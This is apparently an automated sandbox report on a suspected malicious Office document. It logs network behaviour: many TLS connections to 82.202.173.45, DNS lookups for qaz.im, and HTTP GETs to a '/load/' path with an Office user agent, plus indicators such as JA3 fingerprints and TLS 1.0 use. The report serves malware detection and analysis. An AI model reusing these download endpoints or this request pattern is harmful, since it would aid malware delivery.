Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49189
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49189
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49189
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49189
Source: global traffic	TCP traffic: 192.168.2.22:49189 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49189
Source: global traffic	TCP traffic: 192.168.2.22:49189 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49189
Source: global traffic	TCP traffic: 192.168.2.22:49189 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49189
Source: global traffic	TCP traffic: 192.168.2.22:49189 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49189 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49189 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49189
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49190
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49190
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49190
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49190
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49190
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49190
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49190
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49190
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49191 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49191
Source: global traffic	TCP traffic: 192.168.2.22:49191 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49191 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49191
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49191
Source: global traffic	TCP traffic: 192.168.2.22:49191 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49191 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49191
Source: global traffic	TCP traffic: 192.168.2.22:49191 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49191
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49191
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49191
Source: global traffic	TCP traffic: 192.168.2.22:49191 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49191
Source: global traffic	TCP traffic: 192.168.2.22:49191 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49191 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49191
Source: global traffic	TCP traffic: 192.168.2.22:49191 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49191
Source: global traffic	TCP traffic: 192.168.2.22:49191 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49191
Source: global traffic	TCP traffic: 192.168.2.22:49191 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49191
Source: global traffic	TCP traffic: 192.168.2.22:49191 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49191 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49191 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49191
Source: global traffic	TCP traffic: 192.168.2.22:49192 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49192
Source: global traffic	TCP traffic: 192.168.2.22:49192 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49192 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49192
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49192
Source: global traffic	TCP traffic: 192.168.2.22:49192 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49192 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49192
Source: global traffic	TCP traffic: 192.168.2.22:49192 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49192
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49192
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49192
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49192
Source: global traffic	TCP traffic: 192.168.2.22:49192 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49192 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49192
Source: global traffic	TCP traffic: 192.168.2.22:49192 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49192 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49192 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49192 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49192

Potential document exploit detected (performs DNS queries)

Source: global traffic	DNS query: name: qaz.im
Source: global traffic	DNS query: name: qaz.im
Source: global traffic	DNS query: name: qaz.im
Source: global traffic	DNS query: name: qaz.im
Source: global traffic	DNS query: name: qaz.im
Source: global traffic	DNS query: name: qaz.im
Source: global traffic	DNS query: name: qaz.im
Source: global traffic	DNS query: name: qaz.im
Source: global traffic	DNS query: name: qaz.im

Potential document exploit detected (performs HTTP gets)

Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49177 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49177 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49177 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49177 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49177 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49177 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49177 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49177 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49177 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49178 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49178 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49178 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49178 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49178 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49178 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49178 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49178 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49178 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49183 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49183 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49183 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49183 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49183 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49183 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49183 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49183 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49183 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49183 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49184 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49184 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49184 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49184 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49184 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49184 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49184 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49184 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49185 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49185 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49185 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49185 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49185 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49185 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49185 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49185 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49187 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49187 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49187 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49187 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49187 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49187 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49187 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49187 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49188 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49188 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49188 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49188 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49188 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49188 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49188 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49188 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49188 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49188 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49189 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49189 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49189 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49189 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49189 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49189 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49189 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49189 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49189 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49189 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49189 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49189 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49191 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49191 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49191 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49191 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49191 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49191 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49191 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49191 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49191 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49191 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49191 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49191 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49191 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49191 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49191 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49192 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49192 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49192 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49192 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49192 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49192 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49192 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49192 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49192 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49192 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49192 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49192 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49189 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49191 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49192 -> 82.202.173.45:443

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /load/diy5AH/b6d42680-56fd-4f98-ae0e-ff81e3799df6 HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: qaz.imConnection: Keep-AliveCookie: PHPSESSID=mdbvi74n6qrlvvumg9fr8g1sn4
Source: global traffic	HTTP traffic detected: GET /load/diy5AH/b6d42680-56fd-4f98-ae0e-ff81e3799df6 HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: qaz.imConnection: Keep-AliveCookie: PHPSESSID=mdbvi74n6qrlvvumg9fr8g1sn4
Source: global traffic	HTTP traffic detected: GET /load/diy5AH/b6d42680-56fd-4f98-ae0e-ff81e3799df6 HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: qaz.imConnection: Keep-AliveCookie: PHPSESSID=mdbvi74n6qrlvvumg9fr8g1sn4
Source: global traffic	HTTP traffic detected: GET /load/diy5AH/b6d42680-56fd-4f98-ae0e-ff81e3799df6 HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: qaz.imConnection: Keep-AliveCookie: PHPSESSID=mdbvi74n6qrlvvumg9fr8g1sn4

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: THEFIRST-ASRU THEFIRST-ASRU

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View	JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Source: Joe Sandbox View	JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown	HTTPS traffic detected: 82.202.173.45:443 -> 192.168.2.22:49172 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 82.202.173.45:443 -> 192.168.2.22:49173 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 82.202.173.45:443 -> 192.168.2.22:49175 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 82.202.173.45:443 -> 192.168.2.22:49184 version: TLS 1.0

Source: unknown	Network traffic detected: HTTP traffic on port 49185 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49187 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49189
Source: unknown	Network traffic detected: HTTP traffic on port 49183 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49188
Source: unknown	Network traffic detected: HTTP traffic on port 49181 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49187
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49186
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49185
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49184
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49183
Source: unknown	Network traffic detected: HTTP traffic on port 49189 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49182
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49181
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49180
Source: unknown	Network traffic detected: HTTP traffic on port 49172 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49176 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49174 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49191 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49178 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49184 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49179
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49178
Source: unknown	Network traffic detected: HTTP traffic on port 49186 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49177
Source: unknown	Network traffic detected: HTTP traffic on port 49180 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49176
Source: unknown	Network traffic detected: HTTP traffic on port 49182 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49190 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49175
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49174
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49173
Source: unknown	Network traffic detected: HTTP traffic on port 49188 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49172
